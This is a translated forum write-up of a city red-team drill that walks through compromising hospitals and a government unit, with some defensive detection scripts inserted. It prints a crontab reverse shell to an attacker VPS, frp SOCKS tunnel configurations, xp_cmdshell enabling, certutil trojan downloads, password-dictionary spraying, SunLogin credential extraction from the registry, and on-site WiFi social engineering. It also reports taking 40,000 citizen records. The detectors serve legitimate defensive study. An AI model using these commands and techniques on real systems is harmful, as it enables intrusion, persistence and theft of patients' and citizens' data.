Title: Remember an interesting city offensive and defense drill experience

0x00 A few words to start

This attack-and-defense drill was quite interesting. My computer broke down right at the start, so with no machine of my own I ended up borrowing the sales team's computer and working frantically on that.

Partway through, our private target was eliminated. The rules this time still had problems: scoring was done per system for each team rather than per target unit, so another team took some basic and data points on one of our private targets and it was eliminated, leaving only 100 path points. Some sneaky team kept watching our private targets; they had an office-system hole that we didn't, and they drove straight through it as soon as the target was released. Blame it on them being too naughty.

The ranking was as hoped: we finished third. Finishing in the top three with two technical brothers and no back-end support was fine. The two heavyweights ahead of us did not take the championship lightly: one submitted a 0day and the other had well-known back-end support. In the end the top two scored more than half again as much as we did.

Enough chatter, let's get to the content. Masters, please go easy on the code; you are welcome to leave comments at the end of the article to discuss.

0x01 Target

A hospital: weak password on the external network

On the first day, private and public targets were divided up. This target came from the public pool. Luckily a weak password on the external network got us straight in; the main work was identifying the IP address, and there was no technical content in breaking into the intranet. The target was given as an official website address, and the masters of the other teams presumably went after the official website's IP on the cloud. Later we also obtained all permissions through the password files on the information department's dedicated shared server.

Attack Path

[attack path diagram]

Next I walk through the intranet attack process following the numbers marked on the diagram above.

Path 1 / Path 2: weak password on the external network

First, how this target IP was found. Collecting C-segment information from the IP address turned up an H3C device. Logging in with the default audit account password and checking the authorization information in the console confirmed it was the target IP address. The audit account has no permission to configure a VPN tunnel, though, so I did a full-port scan and found SSH on a non-standard port with a weak password. After getting access to the server, the first thing I did was set up a scheduled task for a reverse shell.

crontab -e    (edit the scheduled tasks and add an entry whose command is the line below)

bash -c 'exec bash -i >& /dev/tcp/<your-vps-ip>/<your-vps-port> 0>&1'

Only after the scheduled task was in place did I run fscan, which found many weak SSH and MSSQL passwords in the intranet. I set up several more SSH reverse-shell scheduled tasks so that the foothold would not be lost too easily later.
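Detecting this kind of persistence is the defender's side of the same step. The following Python check, added here and not from the original post, scans crontab text for /dev/tcp and netcat reverse-shell entries and pulls out the destination; the crontab lines are constructed for the example.

```python
import re
from typing import List, Dict

# Constructed sample crontab (not from the original post): one benign backup
# job, one /dev/tcp reverse shell of the kind described above, one netcat
# variant, and a commented-out entry that must not be flagged.
SAMPLE_CRONTAB = """\
# m h dom mon dow command
0 2 * * * /usr/local/bin/backup.sh >> /var/log/backup.log 2>&1
*/5 * * * * bash -c 'exec bash -i >& /dev/tcp/203.0.113.10/4444 0>&1'
@reboot /bin/sh -c 'nc -e /bin/sh 198.51.100.7 9001'
# */5 * * * * bash -i >& /dev/tcp/192.0.2.1/1 0>&1
"""

# Patterns that indicate a shell being wired to a remote socket. The first two
# capture the destination host and port; the third is a weaker indicator.
REVERSE_SHELL_PATTERNS = [
    ("bash-devtcp", re.compile(r"/dev/(?:tcp|udp)/(?P<host>[\w.\-]+)/(?P<port>\d+)")),
    ("netcat-exec", re.compile(r"\bnc(?:at)?\b[^\n]*\s-e\s+\S+\s+(?P<host>[\w.\-]+)\s+(?P<port>\d+)")),
    ("interactive-shell", re.compile(r"\b(?:ba)?sh\s+-i\b")),
]


def scan_crontab(text: str) -> List[Dict[str, str]]:
    """Return one finding per suspicious, non-comment crontab line."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), start=1):
        stripped = line.strip()
        if not stripped or stripped.startswith("#"):
            continue  # commented-out entries never run
        for label, pattern in REVERSE_SHELL_PATTERNS:
            m = pattern.search(stripped)
            if m:
                findings.append({
                    "line": str(lineno),
                    "label": label,
                    "host": m.groupdict().get("host") or "",
                    "port": m.groupdict().get("port") or "",
                    "entry": stripped,
                })
                break  # one finding per line is enough
    return findings


if __name__ == "__main__":
    for f in scan_crontab(SAMPLE_CRONTAB):
        print(f"line {f['line']}: {f['label']} -> {f['host']}:{f['port']}")
```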

There are plenty of weak passwords to be had in the intranet. Set up frp so that it is easier to get into the intranet and move things around later; download the corresponding compiled release.

Project address: https://github.com/fatedier/frp

frp server (frps.ini)

[common]
bind_port=8945

frp client (frpc.ini)

[common]
server_addr=<your-vps-ip>
server_port=8945
tls_enable=true
pool_count=5

[plugin_socks]
type=tcp
remote_port=35145
plugin=socks5
# Authentication: remove the following two lines if you do not want authentication
plugin_user=admin
plugin_passwd=Admin@123
use_encryption=true
use_compression=true

Execute on the VPS

./frps -c frps.ini

Execute on the jump host

./frpc -c frpc.ini

After confirming the connection works, send it to the background with nohup. If your VPS is on Tencent Cloud or Alibaba Cloud, remember to open the corresponding port in the security group, otherwise the connection cannot be made. Proxifier can then be pointed at the SOCKS5 proxy.

Path 3: operations and maintenance machine

This is an operations and maintenance terminal host, reached through the MSSQL weak password scanned just now.

-- Enable xp_cmdshell
EXEC sp_configure 'show advanced options', 1; RECONFIGURE; EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE;

-- Command execution
EXEC master..xp_cmdshell 'whoami';

Related article: https://www.cnblogs.com/websecyw/p/11016974.html

Once commands are confirmed to execute normally with SYSTEM permission, download the trojan with certutil to bring the host online, and after grabbing the password, make sure the administrator is not at the desktop before going in over remote desktop.
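The xp_cmdshell sequence above is also easy to spot in captured T-SQL. This Python detection, added here and not part of the original post, classifies batches that enable, disable or invoke xp_cmdshell and raises one alert when the same login and client enable it and then run a command; the pipe-delimited batch export format and the log lines are constructed assumptions for the example.

```python
import re
from typing import List, Dict

# Constructed sample: pipe-delimited (timestamp|login|client_ip|batch_text)
# export of captured T-SQL batches, e.g. from SQL Server Audit or an Extended
# Events session. The format is an assumption for this example, not a real
# product export format.
SAMPLE_BATCHES = """\
2024-05-01T10:02:11Z|sa|10.0.5.21|SELECT name FROM sys.databases
2024-05-01T10:02:30Z|sa|10.0.5.21|EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;
2024-05-01T10:02:45Z|sa|10.0.5.21|exec master..xp_cmdshell 'whoami'
2024-05-01T10:15:00Z|reportuser|10.0.7.3|SELECT COUNT(*) FROM dbo.Patients
2024-05-01T10:20:00Z|dba|10.0.1.9|EXEC sp_configure 'xp_cmdshell', 0;RECONFIGURE;
"""

ENABLE_RE = re.compile(r"sp_configure\s+'xp_cmdshell'\s*,\s*1\b", re.IGNORECASE)
DISABLE_RE = re.compile(r"sp_configure\s+'xp_cmdshell'\s*,\s*0\b", re.IGNORECASE)
EXEC_RE = re.compile(r"\bxp_cmdshell\s+'(?P<cmd>[^']*)'", re.IGNORECASE)


def classify_batch(batch: str) -> str:
    """Map one T-SQL batch to an event kind ('' when nothing of interest)."""
    if ENABLE_RE.search(batch):
        return "xp_cmdshell_enabled"
    if DISABLE_RE.search(batch):
        return "xp_cmdshell_disabled"
    if EXEC_RE.search(batch):
        return "xp_cmdshell_exec"
    return ""


def scan_batches(text: str) -> List[Dict[str, str]]:
    """Return the xp_cmdshell-related events in order, with who, where and what."""
    events = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, login, client_ip, batch = line.split("|", 3)
        kind = classify_batch(batch)
        if not kind:
            continue
        m = EXEC_RE.search(batch)
        events.append({"ts": ts, "login": login, "client_ip": client_ip,
                       "kind": kind, "cmd": m.group("cmd") if m else ""})
    return events


def enable_then_exec(events: List[Dict[str, str]]) -> List[str]:
    """One alert per (login, client) that enabled xp_cmdshell and then ran a
    command from that same client: the path-3 sequence above as a single signal."""
    enabled, alerts = set(), []
    for ev in events:
        key = (ev["login"], ev["client_ip"])
        if ev["kind"] == "xp_cmdshell_enabled":
            enabled.add(key)
        elif ev["kind"] == "xp_cmdshell_exec" and key in enabled:
            alerts.append(f"{ev['ts']} {ev['login']}@{ev['client_ip']} enabled xp_cmdshell and ran: {ev['cmd']}")
    return alerts
```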

Path 4: full permissions on the server

Only after remoting into the terminal did I learn that this machine is the operations and maintenance machine. The SQL Server connection software was open on the terminal, and the command above was used to enable xp_cmdshell and execute commands. The SQL Server database here had been de-privileged, so the permission obtained was that of the SQL Server service account.

Getting the implant on kept failing: the permissions were too low, Huorong Enterprise Edition was running on the host, and the temp directory was not writable, so I only had SQL Server permissions. After testing I still could not turn Huorong off; presumably the SQL Server permission was too low. Later I found that the Huorong console could distribute files and execute them automatically, so I stopped caring. This can be reproduced and studied later in a lab environment.

Check the passwords saved by the browser. Firefox had the account password of the Huorong console saved, as well as account passwords for some other platforms. Collect the passwords and then try them against other hosts.

Search for keywords with Everything and carefully go through the files on the server and terminal; you may get unexpected results.

Password|Information Department|Asset Table|Topology|Account|Equipment|pass|user|config|Management|Planning

Advanced usage of Everything (regular expressions): you can also search file contents, although content search is slower.

Everything related article: https://www.jianshu.com/p/9c0ab75a264f

On the computer I found device password information and topology information.

Information about all the devices and servers

Basically all network device and server permissions were now available. Here we sorted out the passwords for reuse testing. While sorting them we noticed that the passwords followed a pattern, so we worked out the password rules and used a social-engineering password generation script to generate some passwords.

Tool download address: https://github.com/cityofEmbera/CPassword

The tool is simple to use: we only need to change the names in username.txt. The rules are in dict.txt, and we can make some changes there too, such as adding some rules to the password and recent year information, for example:

@2013
@2014
@2015
@2016
@2017
@2018
@2019
@2020
@2021
@2022
#2013
#2014
#2015
#2016
#2017
#2018
#2019
#2020
#2021
#2022
123!@#
!@#123.
@233
!@#345
!@#qwe

Running python3 createDict.py automatically generates the password file; the passwords are saved in createdict.txt. After generation, the file is handed to kscan as the password file for the password spraying.

kscan.exe -t 10.0.0.0/8 --hydra --hydra-pass file:pwd.txt
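From the other side, the same rules that make this dictionary effective can be used to reject such passwords at change time. This Python check, added here and not from the original post or the CPassword tool, tells whether a password is a username form plus one of the suffix rules listed above; the usernames are constructed, and the year range 2013 to 2022 mirrors the list.

```python
import re
from typing import List, Optional

# Suffix rules of the kind the post lists in dict.txt: year tags with @ or #
# and a few keyboard-walk suffixes. The years are generated here so the check
# covers the same 2013-2022 range without listing each one.
YEAR_SUFFIXES = [f"{sym}{year}" for sym in ("@", "#") for year in range(2013, 2023)]
OTHER_SUFFIXES = ["123!@#", "!@#123.", "@233", "!@#345", "!@#qwe"]
SUFFIXES = YEAR_SUFFIXES + OTHER_SUFFIXES

# Constructed sample of the kind of usernames that would go in username.txt.
SAMPLE_USERNAMES = ["zhangsan", "lisi", "admin", "hisadmin"]


def name_variants(username: str) -> List[str]:
    """Forms a generator would derive from one username: as-is, capitalised,
    upper-case, and with trailing digits stripped (admin01 -> admin)."""
    base = username.lower()
    forms = {base, base.capitalize(), base.upper()}
    stripped = re.sub(r"\d+$", "", base)
    if stripped and stripped != base:
        forms.update({stripped, stripped.capitalize(), stripped.upper()})
    return sorted(forms)


def matches_rule(password: str, usernames: List[str]) -> Optional[str]:
    """Return 'variant+suffix' when the password is a username form followed by
    one of the known suffixes (or the bare username), else None. Suffixes are
    compared case-sensitively and exactly, so 'lisi2019' does not match."""
    for user in usernames:
        for variant in name_variants(user):
            if password == variant:
                return f"{variant}+<none>"
            if password.startswith(variant):
                rest = password[len(variant):]
                if rest in SUFFIXES:
                    return f"{variant}+{rest}"
    return None


def audit(passwords: List[str], usernames: List[str]) -> List[str]:
    """Passwords (e.g. candidates at a policy check) that would fall to the
    generated dictionary, reported as 'password: rule' strings."""
    hits = []
    for pw in passwords:
        rule = matches_rule(pw, usernames)
        if rule:
            hits.append(f"{pw}: {rule}")
    return hits
```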

Path 5: Huorong console file distribution

Here the file distribution function of the Huorong console is used, and the distributed trojan file is executed automatically after distribution. Awesome.

I don't know why my browser froze when opening the console; I asked Master J to open the file for me and distribute it directly.

All the machines with Huorong installed came online; some intranet machines did not come online. If there is any problem with CS 4.3 here, you can choose a relay (pivot) listener to generate the file.

After going through one target machine, the score was basically full: the points for servers, network devices and terminals, plus 40,000 records of citizen personal data found in the Recycle Bin, and we obtained 6k points.

Path 6: cloud assets

This is an information sharing server. I tried the accounts and passwords just collected against it. The SQL Server on it also has weak passwords and can execute commands as well, but since there were too many weak sa passwords before, I did not go through them one by one. If you have passwords here, just use the tool to bring the hosts online.

Just flipping through the files, I found a folder dedicated to the information department on the E drive, and from it obtained the assets on the cloud.

Path 7: domain name permissions

Log in with the account password just found to obtain domain name resolution permissions.

Cloud server permissions; one of these is the official website server, which was the target of the other teams.

Path 8: cloud server permissions

Log in to the Alibaba Cloud console directly and use the C2 to generate PowerShell to bring the hosts online.

A general hospital

This target was opened up to social engineering and near-source (on-site) attacks on the third night after the start.

Attack Path

[attack path diagram]

Path 1: WiFi password

Social engineering and near-source attacks were opened up, and I signed up that same day. After dinner I changed into work clothes and rushed to the hospital with my phone. I usually use Kali NetHunter on my phone and had compiled some ARM versions of tools, which was enough to build a foothold in the intranet.

After arriving on site, open the WiFi Master Key app to search for nearby WiFi.

Connect to the WiFi and confirm that the target IP address is reachable, scan the QR code in WeChat to retrieve the password, and then use that password for spraying in the intranet later.

The gateway address turned out to be an H3C egress device. After logging in to the device with a weak password, the network segment information is there, and the corresponding segments can be scanned based on it.

Path 2: SunLogin (Sunflower) RCE

kscan with the WiFi password file was used to try passwords against fragile ports such as 3389, 22 and 1433, which got one intranet machine and one external-network machine.

The external-network machine had the SunLogin RCE vulnerability. After whoami, SunLogin seemed to hang (I don't know what the problem was here; the cause was never found), and commands executed afterwards showed no output.

Logging in remotely with the password, I found that SunLogin kept reconnecting; exiting and reopening it gave the same result. After getting the implant on, I installed ToDesk just in case, so it could be handled remotely later.

Path 3: target machine

Through ToDesk on the external-network jump host, I scanned the internal server segment directly and sprayed passwords, knocking out one machine. On that server ToDesk was installed, with the ToDesk remote connections of three target machines saved. That was a happy moment.

Add the data from the HIS (hospital information system) on the terminal just now, and the 6k score is full.

A specialized hospital

This hospital was closed at night, so I went early the next morning. Entering was a bit embarrassing, I nearly died of social anxiety. I had not checked what type of hospital it was. There was no WiFi at the door, so I had to go in. As I entered, the doctor at the door, who was also the guard, asked me which department I was going to.

Andrology? Gynecology?

Me: ...

Then, looking at my neck, which had a slight allergic rash: dermatology?

Me: Yes, yes, yes, dermatology.

After entering, I looked up information about this hospital and realised it seemed to be a specialty hospital.

I went in, registered and waited there. There seemed to be no doctor in this hospital who specialized in dermatology; after registering I waited more than an hour. I turned on my phone, got on the WiFi and started scanning the intranet.

Before seeing the doctor I had a jump host with the implant on it, done. There was only one orphan machine in the intranet.

Attack Path

[attack path diagram]

Path 1: WiFi password

Same as before, WiFi Master Key gets us in.

Path 2: target machine

Scanning the intranet here found one MS17-010 host, a Win2012 machine. I tried running msf directly on the phone with a single command.

There was 360 on the machine, and adding an account failed. Certutil was tried, and I saw that there was no SunLogin process. Then we can directly read its configuration file and decrypt it to get onto the machine.

Configuration file paths

Installed version: C:\Program Files\Oray\SunLogin\SunloginClient\config.ini

Portable (green) version: C:\ProgramData\Oray\SunloginClient\config.ini

I tried both of these files.

It should be a newer version; you can try looking in the registry instead. I had 360 in mind and hoped it would not intercept this.

Registry query

reg query HKEY_USERS\.DEFAULT\Software\Oray\SunLogin\SunloginClient\SunloginInfo

reg query HKEY_USERS\.DEFAULT\Software\Oray\SunLogin\SunloginClient\SunloginGreenInfo

It was not intercepted; just throw the result into the tool to decrypt it.

SunLogin decryption tool address: https://github.com/wafinfo/Sunflower_get_Password

The tool is simple to use: after cloning it with git, install unicorn, then run it with python3 and enter the encry_pwd field just obtained from the registry into the script as prompted.

Verify that you can connect; SunLogin then gives direct remote access to the host, and that's done.

A certain government unit

There is not much to say about this unit. In the last few days I went to the government street and sat in a corner by the wall, and counted this as one case. After getting the egress device, you can build a VPN and use L2TP directly to set up a tunnel into the intranet. I tried my best to hold on to a top-three position.

Attack Path

There is no screenshot for this; you can read the articles below for the key steps.

[attack path diagram]

Reference articles:

https://zhiliao.h3c.com/questions/dispcont/146895

https://baijiahao.baidu.com/s?id=1716025203844234922&wfr=spider&for=pc

If the VPN cannot be built, or the device has no VPN authorization but does have NAT and telnet, then with enough patience you can also refer to the ideas in my previous article: use telnet to map the intranet's fragile ports to the external network, and write a script to batch test them to improve efficiency. I did not have time to write that script after the last game.

Article address: https://forum.butian.net/share/1633

0x02 Summary

This time, breaking into the intranet took little effort; the work was mainly lateral attack and defense inside the intranet. When taking the target system in the first hospital, I attacked the target machine from the operations and maintenance machine through xp_cmdshell; the SQL Server database had been de-privileged and the temp directory could not be written, so I could not get the target system that way, and the file was distributed through the Huorong console instead. In fact I had obtained the Huorong console right at the beginning, but was afraid the impact would be too great if I used that function, so I only used it later. I still have to learn more SQL Server techniques; I know too few. The rest was basically social engineering. We got third place by coasting; my computer broke and I used the sales computer, and configuring the environment took too much time.

I also recently saw a good article about SQL Server that I want to share; the community masters have many techniques.

https://forum.butian.net/share/1390

Some things summarized from recent offensive and defensive operations; you are welcome to discuss them with the masters.

Summary of some tips:

External network reconnaissance

Asset collection: ENScan_GO
Space mapping (search engines): fofa / 360quake / shodan / zoomeye / hunter; kunyu / fofa_viewer / infoSearchAll
Lightweight scanners: kscan (service identification; can be combined with fofa to quickly identify C segments); fscan (quickly identifies and scans the C segments of the IPs behind subdomains)
Subdomain information collection: oneforall / subfinder / ksubdomain
Quickly filter real IPs and generate C segments: Eeyes
Web fingerprint recognition: EHole is a good tool (you can add fingerprints and space-mapping engine interfaces); TideFinger (Tide fingerprinting, online detection); httpx (gets web title and status code)

Intranet host information collection

Everything file search (regular expressions improve efficiency)
Passwords saved by browsers / WeChat and QQ folders / Recycle Bin / shared disks / mail software / corporate software
Remote software: remote connections saved by mstsc / intranet connection tools / SunLogin / ToDesk and the like
Common intranet vulnerabilities: SunLogin RCE (SunLogin is really handy), weblogic, s2, redis, shiro

Original address: https://forum.butian.net/share/1719
